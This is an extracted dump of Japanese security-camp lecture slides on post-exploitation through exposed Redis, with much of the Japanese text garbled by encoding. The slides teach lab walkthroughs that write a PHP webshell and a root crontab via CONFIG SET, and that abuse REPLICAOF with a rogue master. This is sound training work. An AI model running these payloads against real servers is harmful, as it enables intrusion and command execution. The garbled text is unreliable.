セキュリティ・キャンプ全国大会2020 オンライン B8 / seccamp2020-b8

ηΩϡϦςΟɾΩϟϯϓશࠃେձ2020ΦϯϥΠϯ Learn the essential way of thinking about vulnerabilities through
post-exploitation on middlewares Teppei Fukuda (@knqyf263)  Taichi Kotake (@tkmru)

͜ͷεϥΠυ͸ຊฤ3FEJTฤͰ͢ !LORZG࡞੒ .Z42-1PTUHSF42-ฤ͸ҎԼࢀর IUUQTTQFBLFSEFDLDPNULNSVTFDDBNQC

ຊ೔ͷྲྀΕ w ͳͥ1PTU&YQMPJUBUJPOΛֶͿͷ͔ʁ w ϛυϧ΢ΣΞͷϩάΠϯޙʹԿ͕ग़དྷΔ͔ʁ w .Z42-ฤ w 1PTUHSF42-ฤʢϋϯζΦϯʣ w
3FEJTฤʢϋϯζΦϯʣ w %PDLFSฤ w ԋश

ࣗݾ঺հ w ໊લɿ5FQQFJ'VLVEB !LORZG w ॴଐɿ"RVB4FDVSJUZ4PGUXBSF-UE 0QFO4PVSDF5FBN 0QFO4PVSDF&OHJOFFS
w ॴࡏ஍ɿ5FM"WJW *TSBFM

ࣗݾ঺հ w ໊લɿ5BJDIJ,PUBLF !ULNSV w ॴଐɿגࣜձࣾΞΧπΩ ɹɹɹηΩϡϦςΟΤϯδχΞ w
ॴࡏ஍ɿ౦ژ w ஶॻ w 8&# %#13&447PM ಛूπʔϧͰ؆୯ʂ͸͡Ίͯͷ੬ऑੑௐࠪʢٕज़ධ࿦ࣾʣ w ϦόʔεΤϯδχΞϦϯάπʔϧ(IJESB࣮ફΨΠυʢϚΠφϏग़൛ʣ

ͳͥ1PTU&YQMPJUBUJPOΛֶͿͷ͔ʁ

1PTU&YQMPJUBUJPOͱ͸ w $BSMPT1FSF[ .FUBTQMPJU։ൃνʔϜʣ w 4IFMMJT0OMZUIF#FHJOOJOHʮγΣϧ͸࢝·Γʹա͗ͳ͍ʯ w &YQMPJUΛ੒ޭͤͨ͋͞ͱͷߦಈ w ৵ೖ͔ͯ͠ΒԿΛ͢Δͷ͔ʁ͕ॏཁ
w ྫ w ݖݶঢ֨ w ύεϫʔυɾϋογϡͷऔಘ w ΩʔϩΨʔ w ύέοτεχοϑΝʔ w FUD

3FDPOOBJTTBODF 8FBQPOJ[BUJPO %FMJWFSZ &YQMPJUBUJPO *OTUBMMBUJPO $PNNBOE $POUSPM "DUJPOPO 0CKFDUJWFT $ZCFS
,JMM$IBJO

ఁ࡯ ࣄલௐࠪ λʔήοτಛఆ ෢ثԽ Ϛϧ΢ΣΞ࡞੒ Exploit४උ ഑ૹ λʔήοτ΁઀ଓ ඪతܕϝʔϧ ϑΟογϯά
߈ܸ ੬ऑੑΛར༻ ෆਖ਼ίʔυͷ࣮ߦ Πϯετʔϧ όοΫυΞઃஔ ৵ೖ؀ڥௐࠪ ৵ೖ֦େ ݖݶঢ֨ ԣײછ ໨తୡ੒ ৘ใ઄औɾվ͟Μ γεςϜഁյ ߈ܸͷྲྀΕʢߨٛ༻ʹ΍΍վมʣ

ఁ࡯ ෢ثԽ ഑ૹ ߈ܸ Πϯετʔϧ ৵ೖ֦େ ໨తୡ੒ कΔଆͷࢹ఺ʢ͋͘·ͰҰྫʣ Ϛϧ΢ΣΞఴ෇ͷ ϝʔϧݕ஌
αϯυϘοΫε Ϛϧ΢ΣΞͷ࣮ߦݕ஌ ֎෦௨৴ͷՄࢹԽɾ؂ࢹ ෆਖ਼ͳ௨৴ݕग़ αʔόͳͲͷ ΞΫηε؂ࢹ ϑΝΠϧ؂ࢹ

ఁ࡯ ෢ثԽ ഑ૹ ߈ܸ Πϯετʔϧ ৵ೖ֦େ ໨తୡ੒ ࠓճͷߨٛ͸ ͜͜ͷ࿩͕ϝΠϯ

։ൃ؀ڥͷμϛʔσʔλ͕ ౪·Ε͚ͨͩʁ 01 S T E P 02 S T
E P 03 S T E P 04 S T E P 05 S T E P ։ൃαʔόͷroot ͸औΒΕͨʁ ຊ൪αʔόʹ΋ ৵ೖ͞Εͨʁ Active Directoryʹ ৵ೖ͞Εͨʁ DB͔Βݸਓ৘ใΛ ౪·Εͨʁ ৵ೖɾ৵֐ൣғͷ೺Ѳ͸ॏཁ

01 S T E P 02 S T E P
03 S T E P 04 S T E P 05 S T E P ৵ೖޙͷ߈ܸํ๏ΛֶΜͰ͓͘ ΠϯύΫτ͕શ͘ҟͳΔ μϛʔσʔλ ݸਓ৘ใ ैۀһ৘ใ ৵ೖޙʹԿ͕ग़དྷͨͷ͔ʁΛ஌͓ͬͯ͘

ݱ࣮ੈքͷ࿩

શͯ೥ͷهࣄ ࠓϗοτͳ࿩୊

ϛυϧ΢ΣΞͷޡͬͨެ։ w ઃఆϛε΍௿͍ηΩϡϦςΟҙࣝʹΑΓϛυϧ΢ΣΞΛΠϯλʔωοτ্ʹ ೝূແ͠ͰʢԾʹ͋ͬͯ΋ऑ͍ೝূͰʣެ։ͯ͠͠·͏ࣄྫ͸ඇৗʹଟ͍ w 3FEJT w &MBTUJDTFBSDI w %PDLFS"1*
w .Z42- w 1PTUHSF42- w FUD ߈ܸऀ͸ϩάΠϯ͠์୊

*OUFSOFU S 1SJWBUF/FUXPSL *OUFSOFU S 1VCMJD/FUXPSL

%#αʔόʹϩάΠϯ͢Δํ๏ ίϚϯυྫ w .Z42- w NZTRMVSPPUIJQΞυϨε w 1PTUHSFT%# w QTRM6QPTUHSFTIJQΞυϨε
w 3FEJT w SFEJTDMJIJQΞυϨε

%#αʔό΁ͷϒϧʔτϑΥʔε /4&ʢ/NBQ4DSJQUJOH&OHJOFʣ w ೝূ͕͔͔͍ͬͯͨ৔߹Ͱ΋ऑ͍΋ͷͳΒ؆୯ʹಥഁՄೳ w /NBQʹ෇ଐ͍ͯ͠ΔεΫϦϓτͰϒϧʔτϑΥʔε߈ܸͰ͖Δ w /NBQʹ͸εΫϦϓτΤϯδϯʢ/4&ʣ͕౥ࡌ͞Ε͍ͯΔ w ྫONBQWQTDSJQUNZTRMCSVUFJQΞυϨε
w ߈ܸऀ͸؆୯ʹ߈ܸͰ͖Δ

ϩάΠϯग़དྷͨʂऴΘΓʁ "Middleware Exploitation is Only the Beginning" 5FQQFJ'VLVEB

ఁ࡯ ෢ثԽ ഑ૹ ߈ܸ Πϯετʔϧ ৵ೖ֦େ ໨తୡ੒ ϛυϧ΢ΣΞ΁ͷ৵ೖ͸࢝·Γ ·ͩ͜͜ Ͳ͜·Ͱग़དྷΔʁ

ఁ࡯ ෢ثԽ ഑ૹ ߈ܸ Πϯετʔϧ ৵ೖ֦େ ໨తୡ੒ ຊߨٛͷର৅ લఏɿϛυϧ΢ΣΞʹ৵ೖ ϑΝΠϧͷಡΈॻ͖
γΣϧͷୣऔ ˞ԣײછͳͲ͸ର৅֎ͱ͠·͢

%#αʔόʹϩάΠϯͰ͖ͨ৔߹ Կ͕Ͱ͖Δ͔ʁ .Z42-1PTUHSF42-ฤ͸ҎԼࢀর IUUQTTQFBLFSEFDLDPNULNSVTFDDBNQC

.Z42-ฤ .Z42-1PTUHSF42-ฤ͸ҎԼࢀর IUUQTTQFBLFSEFDLDPNULNSVTFDDBNQC

1PTUHSFT42-ฤ .Z42-1PTUHSF42-ฤ͸ҎԼࢀর IUUQTTQFBLFSEFDLDPNULNSVTFDDBNQC

3FEJTฤ

w 3FEJTʹ͸,FZ7BMVFΛϑΝΠϧͱͯ͠ॻ͖ग़͢ػೳ͕͋Γɺॻ͖ग़͠ઌ͸ 3FEJTίϚϯυͰมߋՄೳ w ೚ҙͷ৔ॴʹσʔλΛॻ͖ग़͢͜ͱ͕ग़དྷΔ CONFIG SETΛ༻͍ͨํ๏ $ redis-cli 127.0.0.1:6379>
config get dir 1) "dir" 2) "/data" 127.0.0.1:6379> config get dbfilename 1) "dbfilename" 2) "dump.rdb"

σʔλΛdumpͯ͠ΈΔ $ docker run -d --name redis -p 127.0.0.1:6379:6379 redis:5.0
$ docker exec -it redis bash root@824e916202fd:/data# redis-cli 127.0.0.1:6379> set foo bar OK 127.0.0.1:6379> save OK $ 127.0.0.1:6379> exit root@824e916202fd:/data# cat dump.rdb REDIS0009 redis-ver5.0.10 redis-bits@ctimeused-mem aof-preamblefoobarb_ γϦΞϥΠζ͞Ε͍ͯΔ͕ อଘͨ͠GPPCBS͕ ೖ͍ͬͯΔ͜ͱ͕֬ೝͰ͖Δ

w ߨٛ༻ͷΠϝʔδΛىಈ͠ɺSFEJTDMJͰϩάΠϯ͠·͢ w ·ͨɺϒϥ΢βͰIUUQMPDBMIPTUΛ։͍ͯQIQJOGP͕ݟ͑Δ͜ͱΛ ֬ೝͯ͠Լ͍͞ ࣮ࡍʹ΍ͬͯΈΔʢWebshellʣ $ docker rm -f
redis $ docker run -d --name redis -p 127.0.0.1:10080:80 -p 127.0.0.1:6379:6379 knqyf263/redis-configset-webshell $ redis-cli 127.0.0.1:6379> ping PONG

w QIQJOGPʹΑΓVTSTIBSFOHJOYIUNM͕υΩϡϝϯτϧʔτͱ෼͔ͬͨͷͰɺ DPOpHTFUEJSͰࢦఆ w %#ͷμϯϓͳͷͰΰϛ͕ೖΔ͕ɺ QIQ Ͱғͬͨͱ͜Ζ͕1)1ͱͯ͠ೝࣝ͞ ΕΔͷͰલޙͷΰϛ͸໰୊ͳ͍ PHPͷϑΝΠϧΛॻ͖ࠐΉʢWebshellʣ 127.0.0.1:6379>
config set dir /usr/share/nginx/html OK 127.0.0.1:6379> config set dbfilename redis.php OK 127.0.0.1:6379> set test '<?php system($_GET["cmd"]);?>' OK 127.0.0.1:6379> save OK 127.0.0.1:6379> exit

w IUUQMPDBMIPTUSFEJTQIQ DNEJEͳͲͰίϚϯυ͕࣮ߦ͞ΕΔ͜ͱΛ֬ೝ w IUUQMPDBMIPTUSFEJTQIQ DNEUPVDICBSͳͲͰϑΝΠϧ΋࡞੒Ͱ͖Δ w ࣮ࡍʹίϯςφʹϩάΠϯͯ͠ϑΝΠϧ͕࡞੒͞Ε͍ͯΔ͜ͱΛ֬ೝ͢Δ ֬ೝʢWebshellʣ $
docker exec -it redis bash root@6b3e28756441:/data# ls /usr/share/nginx/html/ bar index.html index.php redis.php root@6b3e28756441:/data# cat /usr/share/nginx/html/ redis.php REDIS0009 redis-ver5.0.10 redis-bits@ctimeused-mem aof-preambletest<?php system($_GET["cmd"]);?>' ΰϛ͕ೖ͍ͬͯΔ͕ QIQ ͸ਖ਼͘͠ ॻ͖ࠐ·Ε͍ͯΔ

w DSPO͸ίϚϯυΛఆظతʹ࣮ߦ͢ΔͨΊʹ࢖ΘΕΔ w ಛఆͷҐஔʹҎԼͷϑΥʔϚοτͰॻ͖ࠐΉͱίϚϯυ͕ఆظతʹ࣮ߦ͞ΕΔ ʢ࣮ࡍʹ͸DSPOUBCFͳͲͷίϚϯυΛ௨ͯ͠ฤू͢Δʣ w FUDDSPOUBC WBSTQPPMDSPO FUD crontabόʔδϣϯ
#crontabͷॻࣜ # ʢߦ಄ͷ # ϚʔΫ͸ίϝϯτߦΛࣔ͢ʣ # +------------ ෼ (0 - 59) # | +---------- ࣌ (0 - 23) # | | +-------- ೔ (1 - 31) # | | | +------ ݄ (1 - 12) # | | | | +---- ༵೔ (0 - 6) (೔༵೔=0) # | | | | | # * * * * * ࣮ߦ͞ΕΔίϚϯυ 3FEJT͔ΒDSPOUBCʹॻ͖ࠐΊ͹ ೚ҙίϚϯυ͕࣮ߦՄೳ

w ߨٛ༻ͷΠϝʔδΛىಈ͠ɺSFEJTDMJͰϩάΠϯ͠·͢ ࣮ࡍʹ΍ͬͯΈΔʢcrontabʣ $ docker rm -f redis # ͖ͬ͞ͷ΍ͭΛফ͓ͯ͘͠
$ docker run -d --name redis -p 127.0.0.1:6379:6379 knqyf263/redis-configset- cron $ redis-cli 127.0.0.1:6379> ping PONG

w ࠓճ͸WBSTQPPMDSPOSPPUʹॻ͖ࠐΉ w ˞ҰൠϢʔβͩͱ௨ৗ্هͷσΟϨΫτϦʹ͸ॻ͖ࠐΈݖݶ͕ͳ͍ w ΰϛ͕ೖΔ͕ɺߦ୯ҐͰͷղऍͳͷͰվߦ͓͚ͯ͠͹໰୊ͳ͘ಈ࡞ cronͷઃఆΛॻ͖ࠐΉ 127.0.0.1:6379> config set
dir /var/spool/cron/ OK 127.0.0.1:6379> config set dbfilename root OK 127.0.0.1:6379> set payload "\n*/1 * * * * /bin/touch /tmp/foo\n" OK 127.0.0.1:6379> save OK 127.0.0.1:6379> exit

w ࣮ࡍʹίϯςφʹϩάΠϯͯ͠ϑΝΠϧ͕࡞੒͞Ε͍ͯΔ͜ͱΛ֬ೝ͢Δ ֬ೝʢcrontabʣ $ docker exec -it redis bash [root@267da3bc4d5f
/]# ls /tmp/foo /tmp/foo [root@267da3bc4d5f /]# cat /var/spool/cron/root REDIS0007 redis-ver3.2.12 redis-bits@ctimeused-meme payload! */1 * * * * /bin/touch /tmp/foo Q<Ў K ͜ͷߦ͚͕ͩ ਖ਼ৗʹղऍ͞ΕΔ ෼ʹ౓࣮ߦʣ

w ੈ͸େΫϥ΢υ࣌୅ w ίϯςφԽ͞Ε͍ͯΕ͹8FCαʔόͱ3FEJTαʔό͸௨ৗผʹ͢Δ w DSPOUBC͸͋·Γ࢖ΘΕͳ͍ w ڧ͍ݖݶ͕ඞཁ CONFIG SETͷ໰୊఺
͋·Γࢗ͞Βͳ͍

w 3FEJTͷϨϓϦέʔγϣϯػೳΛѱ༻͢Δ REPLICAOFΛ༻͍ͨํ๏ εϨʔϒ͕ηοτΞοϓ͞ΕͨΒɺεϨʔϒ͸઀ଓΛ௨ͯ͡ 4:/$ίϚϯυΛૹΓ·͢ɻॳճͷ઀ଓͰ΋࠶઀ଓͰ΋ಉ͡Ͱ͢ɻ Ϛελʔ͸όοΫάϥ΢ϯυɾηʔϒΛ։࢝͠ɺ·ͨɺҎ߱ʹड৴͢Δɺ σʔλɾηοτΛมߋ͢Δ͢΂ͯͷίϚϯυͷόοϑΝΛ࢝Ί·͢ɻ όοΫάϥ΢ϯυɾηʔϒ͕׬ྃͨ͠ΒɺϚελʔ͸σʔλϕʔεϑΝΠϧΛ εϨʔϒʹసૹ͠ɺεϨʔϒ͸ͦΕΛσΟεΫʹอଘɺ͓ΑͼϝϞϦ΁ϩʔυ͠·͢ɻ ͦͷޙɺϚελʔ͸͢΂ͯͷόοϑΝ͞ΕͨίϚϯυΛεϨʔϒʹૹ৴͠·͢ɻ
͜Ε͸ίϚϯυͷετϦʔϜͱ࣮ͯ͠ݱ͞Ε͍ͯͯɺ 3FEJTϓϩτίϧͦͷ΋ͷͱಉ͡ϑΥʔϚοτΛ΋ͪ·͢ɻ IUUQTSFEJTEPDVNFOUBTJPOKBQBOFTFSFBEUIFEPDTJPKBMBUFTUUPQJDTSFQMJDBUJPOIUNM

3FEJTͷ3FQMJDBUJPO .BTUFS 3FQMJDB 4:/$14:/$ %#μϯϓ 4:/$͸14:/$ͷݹ͍൛Ͱ͕͢ɺ ࠓճͷߨٛͰ؆୯ͷͨΊʹ࢖͏ͷͰॻ͍͍ͯ·͢ σΟεΫʹอଘ ϝϞϦʹϩʔυ ίϚϯυసૹ

3FQMJDBͷϑϦΛͯ͠.BTUFSʹ4:/$14:/$ΛൃߦͰ͖Δ SYNC/PSYNCͷڍಈΛ͔֬ΊΔ εϨʔϒ͕ηοτΞοϓ͞ΕͨΒɺεϨʔϒ͸઀ଓΛ௨ͯ͡ 4:/$ίϚϯυΛૹΓ·͢ɻॳճͷ઀ଓͰ΋࠶઀ଓͰ΋ಉ͡Ͱ͢ɻ Ϛελʔ͸όοΫάϥ΢ϯυɾηʔϒΛ։࢝͠ɺ·ͨɺҎ߱ʹड৴͢Δɺ σʔλɾηοτΛมߋ͢Δ͢΂ͯͷίϚϯυͷόοϑΝΛ࢝Ί·͢ɻ όοΫάϥ΢ϯυɾηʔϒ͕׬ྃͨ͠ΒɺϚελʔ͸σʔλϕʔεϑΝΠϧΛ εϨʔϒʹసૹ͠ɺεϨʔϒ͸ͦΕΛσΟεΫʹอଘɺ͓ΑͼϝϞϦ΁ϩʔυ͠·͢ɻ ͦͷޙɺϚελʔ͸͢΂ͯͷόοϑΝ͞ΕͨίϚϯυΛεϨʔϒʹૹ৴͠·͢ɻ ͜Ε͸ίϚϯυͷετϦʔϜͱ࣮ͯ͠ݱ͞Ε͍ͯͯɺ
3FEJTϓϩτίϧͦͷ΋ͷͱಉ͡ϑΥʔϚοτΛ΋ͪ·͢ɻ IUUQTSFEJTEPDVNFOUBTJPOKBQBOFTFSFBEUIFEPDTJPKBMBUFTUUPQJDTSFQMJDBUJPOIUNM

SYNC/PSYNCͷڍಈΛ͔֬ΊΔ $ docker rm -f redis # ͖ͬ͞ͷ͸ফ͢ $ docker
run -d --name redis -p 127.0.0.1:6379:6379 redis:5.0 $ telnet localhost 6379 SYNC $176 REDIS0009 redis-ver5.0.10 redis-bits@ctime used-mem°repl-stream-dbrepl- id(8d0e0dc1a11f2129499a0a8ff1d25151f69e679e repl-offset8 aof-preamble$*1 %#ͷμϯϓʢ3%#ϑΥʔϚοτʣ͕߱ͬͯ͘Δ

5FMOFUͰ4:/$ίϚϯυΛൃߦ .BTUFS 4:/$14:/$ 3%#ϑΝΠϧ 5FMOFU ଞͷίϚϯυಉ༷ ௨ৗͷ3FEJTϓϩτίϧ 1$

PING $ telnet localhost 6379 SYNC ... *1 $4 PING
4:/$Λൃߦͯ͠͠͹Β͘଴ͭͱ.BTUFS͔Β1*/(͕ඈΜͰ͘Δ ݟ׳Εͳ͍ܗ

Redis Serialization Protocol (RESP) $ telnet localhost 6379 SYNC ...
*1 $4 PING DMJFOUTFSWFSؒͷ΍ΓͱΓͷͨΊͷϓϩτίϧ .BTUFS3FQMJDB΋ؚΉʣ "SHVNFOUTDPVOU "SHVNFOUTMFOHUI "SHVNFOUTWBMVF IUUQTSFEJTJPUPQJDTQSPUPDPM

Redis Serialization Protocol (RESP) *3 $3 SET $7 keyname $5
value WBMVFͷ௕͞͸ LFZOBNFͷ௕͞͸ 4&5ͷ௕͞͸ Ҿ਺͸ͭ 4&5LFZOBNFWBMVF

w छྨ͕αϙʔτ͞Ε͍ͯΔ w 1MBJOUFYUʢεϖʔε۠੾Γʣ w 4&5LFZOBNFWBMVF w $VTUPN w
4&5 LFZOBNF WBMVF Redis Serialization Protocol (RESP)

ཪଆ·Ͱཧղ͢Δͷ͕ॏཁ ͨͩར༻͢Δ͚ͩ FHSFEJTDMJ΍ϥΠϒϥϦͰσʔλΛग़͠ೖΕ ཪଆ·Ͱཧղ͢Δ FH3FEJT4FSJBMJ[BUJPO1SPUPDPMΛֶͿ ηΩϡϦςΟʹ͓͍ͯ͸͕ͬͪ͜ॏཁ

w .BTUFSͰ࣮ߦ͞ΕͨίϚϯυ͸3FQMJDBʹసૹ͞ΕΔ RDBϑΝΠϧͷૹ৴ޙ εϨʔϒ͕ηοτΞοϓ͞ΕͨΒɺεϨʔϒ͸઀ଓΛ௨ͯ͡ 4:/$ίϚϯυΛૹΓ·͢ɻॳճͷ઀ଓͰ΋࠶઀ଓͰ΋ಉ͡Ͱ͢ɻ Ϛελʔ͸όοΫάϥ΢ϯυɾηʔϒΛ։࢝͠ɺ·ͨɺҎ߱ʹड৴͢Δɺ σʔλɾηοτΛมߋ͢Δ͢΂ͯͷίϚϯυͷόοϑΝΛ࢝Ί·͢ɻ όοΫάϥ΢ϯυɾηʔϒ͕׬ྃͨ͠ΒɺϚελʔ͸σʔλϕʔεϑΝΠϧΛ εϨʔϒʹసૹ͠ɺεϨʔϒ͸ͦΕΛσΟεΫʹอଘɺ͓ΑͼϝϞϦ΁ϩʔυ͠·͢ɻ ͦͷޙɺϚελʔ͸͢΂ͯͷόοϑΝ͞ΕͨίϚϯυΛεϨʔϒʹૹ৴͠·͢ɻ

5FMOFUͰίϚϯυΛ؍࡯ .BTUFS 4:/$14:/$ 3%#ϑΝΠϧ 1$ ίϚϯυసૹ ίϚϯυ࣮ߦ

$ telnet localhost 6379 SYNC ... *2 $6 SELECT $1
0 *3 $3 set $3 foo $3 bar $ redis-cli 127.0.0.1:6379> set foo bar OK %#Λબ୒ 4&-&$5 LFZWBMVFΛอଘ TFUGPPCBS ͜ΕΒͷίϚϯυ͸3FQMJDBͰ୯ʹ࣮ߦ͞ΕΔ

3&1-*$"0'ͷѱ༻ 7JDUJN 3FQMJDB "UUBDLFS w 3&1-*$"0'Λ࢖͑͹௨ৗͷ3FEJTΠϯελϯεΛڧҾʹ3FQMJDBʹઃఆՄೳ w .BTUFSΛ"UUBDLFSͷϚγϯʹ͓͚ͯ͠͹4:/$͕3FQMJDB͔ΒඈΜͰ͘Δ 3&1-*$"0'Ͱ"UUBDLFSΛ
.BTUFSʹઃఆ͢Δ 4:/$14:/$

3FQMJDBʹ೚ҙͷ3FEJTίϚϯυΛൃߦՄೳ 3%#ϑΝΠϧ ೚ҙͷίϚϯυΛྲྀ͠ࠐΉ w .BTUFSʹͳΓ͢·ͯ͠೚ҙͷίϚϯυΛసૹ͢Δͱ3FQMJDBͰ࣮ߦ͞ΕΔ 3&1-*$"0'Ͱ"UUBDLFSΛ .BTUFSʹઃఆ͢Δ 4:/$14:/$ "UUBDLFS
3FQMJDB

3FQMJDBʹ೚ҙͷ3FEJTίϚϯυΛൃߦՄೳ 3FEJT "UUBDLFS w 443'ͳͲͰϨεϙϯε͕ड͚औΕͳ͍ঢ়گͰ΋༗ޮ w Πϯλʔωοτʹ3FEJTΛࡽ͍ͯ͠ͳͯ͘΋ࢗ͞Δ ੬ऑͳ8FCαʔό ࣾ಺ 3FRVFTU
3&1-*$"0' 4:/$

3FQMJDBʹ೚ҙͷ3FEJTίϚϯυΛൃߦՄೳ w ࣮ࡍʹ͸ϨεϙϯεΛड͚औΔͨΊʹ͸΋͏গ͠޻෉͕ඞཁ w ຊߨٛͰ͸Πϯλʔωοτ্ʹެ։͞Εͯ͠·ͬͨ3FEJTͳͲɺ௚઀3FEJTʹೖΕΔલ ఏͰਐΊΔͨΊݩ͔Β೚ҙͷ3FEJTίϚϯυ͕࣮ߦՄೳͰϨεϙϯε΋ड͚औΕΔ૝ఆ IUUQT[FSPOJHIUTSVXQDPOUFOUVQMPBETNBUFSJBMTSFEJTQPTUFYQMPJUBUJPOQEG 3FEJT "UUBDLFS
೚ҙͷ3FEJTίϚϯυ

w ࠶ͼ3FQMJDBUJPOͷڍಈΛ֬ೝ REPLICAOFΛ༻͍ͨํ๏ εϨʔϒ͕ηοτΞοϓ͞ΕͨΒɺεϨʔϒ͸઀ଓΛ௨ͯ͡ 4:/$ίϚϯυΛૹΓ·͢ɻॳճͷ઀ଓͰ΋࠶઀ଓͰ΋ಉ͡Ͱ͢ɻ Ϛελʔ͸όοΫάϥ΢ϯυɾηʔϒΛ։࢝͠ɺ·ͨɺҎ߱ʹड৴͢Δɺ σʔλɾηοτΛมߋ͢Δ͢΂ͯͷίϚϯυͷόοϑΝΛ࢝Ί·͢ɻ όοΫάϥ΢ϯυɾηʔϒ͕׬ྃͨ͠ΒɺϚελʔ͸σʔλϕʔεϑΝΠϧΛ εϨʔϒʹసૹ͠ɺεϨʔϒ͸ͦΕΛσΟεΫʹอଘɺ͓ΑͼϝϞϦ΁ϩʔυ͠·͢ɻ ͦͷޙɺϚελʔ͸͢΂ͯͷόοϑΝ͞ΕͨίϚϯυΛεϨʔϒʹૹ৴͠·͢ɻ

3%#ϑΝΠϧͷಉظ .BTUFS 3FQMJDB 4:/$14:/$ %#μϯϓ σΟεΫʹอଘ ϝϞϦʹϩʔυ ͜͜Λվ͟Μ͢Ε͹ ޷͖ͳϑΝΠϧΛ3FQMJDBʹ อଘͤ͞ΒΕͦ͏

೚ҙͷϑΝΠϧΛ3FQMJDBʹॻ͖ࠐΊΔ ೚ҙͷσʔλ w 3%#ϑΝΠϧͷ୅ΘΓʹ޷͖ͳϑΝΠϧΛྲྀ͠ࠐΉ 3&1-*$"0' 4:/$14:/$ "UUBDLFS 3FQMJDB

3FQMJDBUJPO*OUFSOBM w 1*/(Ͱૄ௨֬ೝ͠ɺ3&1-$0/'Ͱ3FQMJDBͷઃఆΛૹΔ 1*/( "UUBDLFS 3FQMJDB 10/( 3&1-$0/'
0, 14:/$ ৄࡉ͸ޙड़

ϋϯζΦϯ؀ڥ w 3FEJT͔Βͷ઀ଓΛड͚Δඞཁ͕͋ΔͷͰEPDLFSDPNQPTFͰࢼ͢ w SPHVFͱSFEJTͷͭͷίϯςφ͕ىಈ͍ͯ͠Δ w جຊతʹSPHVFʹϩάΠϯͯ͠࡞ۀ͢Δ SPHVF SFEJT EPDLFSDPNQPTF
SFEJTDMJ EPDLFSDPNQPTFFYFD ߈ܸ༻؀ڥ ΍ΒΕ3FEJT

$ cd [޷͖ͳdir] $ wget https://gist.githubusercontent.com/ knqyf263/16232934bd772ee9f8c76f4a10447aa2/raw/ fa6638ca34f279b1d5f06d1ddf2f83079589fe5b/docker-compose.yml $ docker-compose
up -d $ docker-compose exec rogue bash ؀ڥͷىಈ w ޷͖ͳσΟϨΫτϦʹҠಈͯ͠EPDLFSDPNQPTFZNMΛμ΢ϯϩʔυ͢Δ w EPDLFSDPNQPTFΛىಈͯ͠FYFDͰSPHVFʹϩάΠϯ͢Δ ϋϯζΦϯதʹίϯςφ͕ࢮΜͩΒ EPDLFSDPNQPTFEPXOEPDLFSDPNQPTFVQE͢Δ ʢෆਖ਼ͳ3%#ϑΝΠϧͰΫϥογϡ͢Δ͜ͱ͕͋Δʣ

REPLICAOFͷઃఆ w SFEJTʹରͯ͠SPHVF͔ΒSFEJTDMJͰϩάΠϯ͢Δ w 3&1-*$"0'ίϚϯυΛ࢖ͬͯSPHVFͷ൪ϙʔτΛNBTUFSʹࢦఆ w EPDLFSDPNQPTF͓͔͛ͰSPHVFͰ໊લղܾͰ͖Δ SPHVF SFEJT EPDLFSDPNQPTF
3&1-*$"0'SPHVF SFQMJDBͱͯ͠ NBTUFS SPHVF ʹܨ͗ʹདྷΔ root@b6d0575dafc4:/rogue# redis-cli -h redis replicaof rogue 10000

NetcatίϚϯυ w ؆қͳΫϥΠΞϯτɺαʔόͷϓϩηεΛىಈ͢ΔίϚϯυ w Φϓγϣϯ w MMJTUFONPEF GPSJOCPVOEDPOOFDUT w QQPSUMPDBMQPSUOVNCFS
w LTFULFFQBMJWFPQUJPOPOTPDLFU root@b6d0575dafc4:/rogue# nc -klp 10000 *1 $4 PING 3FQMJDB͔Β1*/(͕ ඈΜͰ͖͍ͯΔ IUUQTMJOVYEJFOFUNBOOD

PINGʹԠ౴ͯ͠ΈΔ IUUQTMJOVYEJFOFUNBOOD w 1*/(͸ૄ௨֬ೝͳͷͰ 10/(΍ 0,ͳͲΛฦ͢ʢԠ౴͸ Λ͚ͭΔʣ root@b6d0575dafc4:/rogue# nc -klp
10000 *1 $4 PING +PONG *3 $8 REPLCONF $14 listening-port $4 6379 ࣍ͷίϚϯυ͕ ඈΜͰ͖͍ͯΔ

REPLCONF w υΩϡϝϯτʹ͸ͳ͍ͷͰιʔείʔυΛಡΉ w 3FQMJDB͕.BTUFSʹରͯࣗ͠෼ͷઃఆΛ఻͑ΔίϚϯυͰ͋Δ͜ͱ͕෼͔Δ IUUQTHJUIVCDPNSFEJTSFEJTCMPCCDGFDCFBGCGEFDDDTSDSFQMJDBUJPOD--

REPLCONF listening-port w 3FQMJDBͷ-JTUFOJOH1PSUΛ఻͑ΔΦϓγϣϯ w 3&1-$0/'MJTUFOJOHQPSU IUUQTHJUIVCDPNSFEJTSFEJTCMPCCDGFDCFBGCGEFDDDTSDSFQMJDBUJPOD--

REPLCONFʹԠ౴͢Δ w ͨͩͷ"$,ͳͷͰ 0,Ͱ΋ '00Ͱ΋ԿͰ΋ྑ͍ w 3&1-$0/'MJTUFOJOHQPSU w 0, *3
$8 REPLCONF $14 listening-port $4 6379 +FOO *5 $8 REPLCONF $4 capa $3 eof $4 capa $6 psync2 ࣍ͷ3&1-$0/'͕ ඈΜͰ͖͍ͯΔ

REPLCONF capa w 3FQMJDBͷDBQBCJMJUZΛ఻͑ΔΦϓγϣϯ w 3&1-$0/'DBQBFPGQTZOD IUUQTHJUIVCDPNSFEJTSFEJTCMPCGF⒎EBCECBDCEEFCBTSDTFSWFSI--

REPLCONF capaʹԠ౴͢Δ w ͨͩͷ"$,ͳͷͰ 0,Ͱ΋ '00Ͱ΋ԿͰ΋ྑ͍ w 3&1-$0/'DBQBFPGDBQBQTZOD w 0,
*5 $8 REPLCONF $4 capa $3 eof $4 capa $6 psync2 +OK *3 $5 PSYNC $40 d3d15637ec5ecf9f593ebb5f7345c3e2b2f5268 9 $1 1 14:/$͕ ඈΜͰ͖͍ͯΔ

͜͜·ͰͷྲྀΕ SPHVF SFEJT 1*/( 0, 14:/$ 3&1-$0/' 0,
3&1-$0/' 0,

PSYNC w ಉظΛ్த͔Β࠶։͢ΔͨΊͷίϚϯυ w .BTUFS͸P⒎TFU෼͚ͩͣΒͯࠩ͠෼͚ͩฦ͢ w 14:/$SFQMJDBUJPOJEP⒎TFU w SFQMJDBUJPOJE͸จࣈ w
14:/$EEFDFDGGFCCGDFCG w ॳճͷ৔߹͸14:/$ͱ͔14:/$ ͱ͔ʹͳΔ *3 $5 PSYNC $40 d3d15637ec5ecf9f593ebb5f7345c3e2b2f52689 $1 1

PSYNCʹର͢Δ߈ܸʢ1/2ʣ w 14:/$ʹ"$,Λฦ͢ͱ4:/$͕ඈΜͰ͘ΔͷͰϖΠϩʔυΛૹΔʢࠩ෼ѻ͍ʣ w ॳճͳΒ3%#ϑΝΠϧ͸ۭͳͷͰ͜ΕͰ೚ҙͷϑΝΠϧΛॻ͖ࠐΊΔ SPHVF SFEJT 14:/$
